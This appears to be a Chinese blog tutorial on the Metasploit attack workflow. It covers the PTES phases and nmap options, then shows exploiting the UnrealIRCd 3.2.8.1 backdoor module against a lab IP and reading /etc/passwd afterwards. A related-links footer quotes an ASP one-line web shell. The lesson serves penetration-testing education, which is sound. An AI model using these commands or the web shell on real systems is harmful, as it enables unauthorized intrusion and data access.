Metasploit 进阶第一讲    攻击流程及命令介绍

 

01.渗透测试过程环节(PTES

 

1.前期交互阶段:与客户组织进行交互讨论,确定范围,目标等

2.情报搜集阶段:获取更多目标组织信息,NmapNessus

3.威胁建模阶段:理清头绪,确定出最可行的攻击通道

4.漏洞分析阶段:搜索可获取的渗透代码资源

5.渗透攻击阶段:找出安全漏洞,入侵系统

6.后渗透攻击阶段:你想干什么,Mctcrprctcr

7.报告阶段:渗透测试报告

 

 

 

02. Metasploit漏洞利用环节

 

情报搜集阶段

 

外围信息搜索   -    Google Hacking等

主机探测与端口扫描          -Nmap等

服务扫描       -auxiliary/scanner/tclnet/…等(见目录)

网络漏洞扫描   -OpenVAS、Nessus等

 

情报搜集阶段—Nmap

格式:nmap<扫描选项,<扫描目标>

·扫描选项:指定扫描方式      ·扫描目标:

-sn         -探测存活主机,不扫描端口                         单个p地址

-o                  -目标操作系统识别                                          多个p地址,用逗号分割(,)

-sV         -详细服务版本信息                                         连续ip地址,用连字符号(-)

-f                   -快速扫描                                                    CIDR表示,192.168.22.0/24

-sT/-sS/-sA                 -全连接/syn扫描/ack扫描,

同auxiliary/scanner/portscan/..模块

-sU                              -udp端口扫描了

-p<端口范围>           指定扫描端口

 

  

Nmap  –sV  -o  192.168.24.139

 

状态:

open 应用程序正在此端口监听

closed 主机响应,无应用程序监听

filtered 不确定是否开放

unfiltered 无法确定端口是否开放(仅出现在ack扫描时)

nmap  -A  -p  6667   192.168.24.139

 

情报搜集阶段--其他姿势

漏洞分析阶段

 

IRC:“Internet Rely Chat”的缩写,网络中继聊天,通过网络的即时交流工具。

IRC运作方式:是一种分布式的客户端/服务器的结构,一个IRC服务器内部包含多个IRC频道,这些频道和qq群类似。若频道不是保留频道且频道中无人,该频道就会消失,而想加入某个频道,若频道名不存在,则会创建这个频道,创建者为管理员,频道内部可私聊。

IRC端口:服务器端口:6667,客户端端口:6697,连接使用的是SSL。

 

1.msfconsole             -启动metasploit框架

2.search unreal ircd3.2.8.1     -在metasploit框架中查询相关模块

3.info exploit/unix/irc/unreal_ircd_3.2.8.1_backdoor  -查看模块信息,命名规则:模块类型/目标平台/目标服务/模块名称

4.cat/usr/share/metasploit-framework/modules/exploits/unix/irc/unreal_ircd_3281_backdoor.rb         -查看源代码(也可在目录中查看)

渗透攻击阶段

1.use exploit/unix/irc/unreal_ircd_3281_backdoor             -使用该模块

2.show  options    -查看需配置的参数(Required为yes的选项必须配置)

3.set  rhosts  192.168.24.139     -配置目标ip地址

4.run/exploit   -运行该模块

5.whoami;cat/etc/passwd      -成功后查看目标主机信息

 

 

Metasploit漏洞利用流程总结

 

Metasploit命令:

1.     msfconsole

2.     search相关模块

3.     use模块路径

4.     show  options

5.set <参数名称> <参数信息

6.run/exploit

7..

 

 

3.Metasploit攻击流程及命令介绍的更多相关文章

  1. git各种命令介绍以及碰到的各种坑

    一.各种命令介绍: git pull:从其他的版本库(既可以是远程的也可以是本地的)将代码更新到本地,例如:'git pull origin master'就是将origin这个版本库的代码更新到本地 ...

  2. 5.Metasploit攻击载荷深入理解

    Metasploit 进阶第三讲 深入理解攻击载荷   01 Nesus介绍.安装及使用 Nessus介绍 Nessus是一款著名的漏洞扫描及分析工具,提供完整的漏洞扫描服务,并随时更新漏洞数据库. ...

  3. 12个Linux进程管理命令介绍(转)

    12个Linux进程管理命令介绍 [日期:2015-06-02] 来源:Linux中国  作者:Linux [字体:大 中 小]   执行中的程序在称作进程.当程序以可执行文件存放在存储中,并且运行的 ...

  4. 2.SDK目录结构和adb工具及命令介绍

    安卓开发学习笔记 1.安卓开发之环境搭建 2.SDK目录结构和adb工具及命令介绍 1.SDK目录介绍: ******************************** add-ons:Androi ...

  5. [推荐]DDOS攻击与防范知识介绍

    [推荐]DDOS攻击与防范知识介绍 DDOS攻防体系建设v0.2(淘宝-林晓曦)     http://wenku.baidu.com/view/39549a11a8114431b90dd866.ht ...

  6. tar.xz如何解压:linux和windows下tar.xz解压命令介绍

    在linux下怎么解压和压缩tar.xz文件? (本文由www.169it.com搜集整理) 在linux下解压tar.xz文件步骤 1 2 # xz -d ***.tar.xz  //先解压xz # ...

  7. 查看MySQL数据库表的命令介绍

    如果需要查看MySQL数据库中都有哪些MySQL数据库表,应该如何实现呢?下面就为您介绍查看MySQL数据库表的命令,供您参考. 进入MySQL Command line client下查看当前使用的 ...

  8. Docker学习总结之Run命令介绍

    Docker学习总结之Run命令介绍 本文由Vikings(http://www.cnblogs.com/vikings-blog/) 原创,转载请标明.谢谢! 在使用Docker时,执行最多的命令某 ...

  9. maven常用命令介绍

    mvn 3.0.4 创建maven项目命令  mvn  archetype:generate   -DgroupId=damocles-autocredit -DartifactId=damocles ...

随机推荐

  1. IIS6.0文件解析漏洞和短文件名漏洞复现

    一.IIS6.0文件解析漏洞 1.ASP一句话木马的准备 新建木马文件“muma.txt”,将“我asp是一句话木马:<%eval request("asp")%>”写 ...

  2. Python一键转Jar包,Java调用Python新姿势!

    粉丝朋友们,不知道大家看故事看腻了没(要是没腻可一定留言告诉我^_^),今天这篇文章换换口味,正经的来写写技术文.言归正传,咱们开始吧! 本文结构: 需求背景 进击的Python Java和Pytho ...

  3. py2.7 批量转换文件为 utf8 编码

    source insight 不支持 utf8 ,但是在 linux 上查看的时候是 utf8 编码,就会显示不正常,所以写了个 python 小脚本,可以批量转换 py2.7 #coding:utf ...

  4. RStudio终端操作

    转于:https://support.rstudio.com/hc/en-us/articles/115010737148-Using-the-RStudio-Terminal#send 原文是英文版 ...

  5. Java反射之Class类

    接下来的几章,我们谈一谈java的反射机制. 反射就是从一个java类中映射出一个java类或是一个实例.通常在很多框架中都用到反射,比如常用的ssm框架,在配置文件中总是会写到类的全名,框架通过读取 ...

  6. MySQL基础篇(06):事务管理,锁机制案例详解

    本文源码:GitHub·点这里 || GitEE·点这里 一.锁概念简介 1.基础描述 锁机制核心功能是用来协调多个会话中多线程并发访问相同资源时,资源的占用问题.锁机制是一个非常大的模块,贯彻MyS ...

  7. Linux与unix shell编程指南

    第14章 环境和shell变量 1.使用变量时,尽量用花括号将之括起来,防止shell误解变量值. 2.设置变量时的不同模式 variable-name=value 设置实际值到variable-na ...

  8. Qt5小Demo之猜数字游戏

    玩法:设定时间进行猜数字,所猜数字为一个四位数,输入自己的数字,系统会提示是大了还是小了,依据条件逐步逼近正确结果.在规定时间里猜对即获胜,否则即失败. 平台支持:Win10下测试正常. 源码地址: ...

  9. 详解如何实现斗鱼、B站等全局悬浮窗直播小窗口

    最近业务需求需要我们直播返回或者退出直播间时,开一个小窗口在全局继续直播视频,先看效果图. 调研了一下当下主流直播平台,斗鱼.BiliBili等app,都是用WindowManger做的(这个你可以在 ...

  10. (转)SpringBoot :(has no explicit mapping for /error)

    转载自:https://www.cnblogs.com/panchanggui/p/9945261.html 异常:This application has no explicit mapping f ...